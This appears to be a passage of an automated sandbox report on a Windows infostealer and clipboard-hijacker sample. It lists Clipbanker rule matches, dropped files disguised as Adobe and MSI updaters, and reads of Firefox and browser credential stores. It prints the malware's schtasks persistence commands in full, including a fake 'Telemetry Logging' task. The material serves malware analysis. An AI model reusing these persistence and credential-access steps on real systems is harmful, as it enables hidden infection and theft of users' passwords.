            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D48F60
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D45AB0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D30B90
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D67880
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D72840
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2F9D0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D6E999
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D24910
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
            Source: C:\Users\user\Desktop\file.exeCode function: String function: 06D66140 appears 58 times
            Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
            Source: file.exe, 00000000.00000002.4443680764.0000000001125000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
            Source: file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
            Source: file.exe, 00000000.00000000.1990364908.0000000001125000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
            Source: file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
            Source: file.exeBinary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/32@5/4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D29130 CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqliteJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
            Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeMutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4748:120:WilError_03
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: file.exe, 00000000.00000003.2113965338.000000000647E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.000000000647E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, da`;H
            Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: file.exe, 00000000.00000003.2122632450.0000000006540000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124050663.000000000173B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2112112086.0000000006483000.00000004.00000020.00020000.00000000.sdmp, HYMDMNDHbpvCLogin Data.0.dr, yDHoBcv6VALYLogin Data For Account.0.dr, KNCS9xAjcy97Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
            Source: unknownProcess created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: d3d11.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: dxgi.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: d3d10warp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: dxcore.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: devobj.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dll
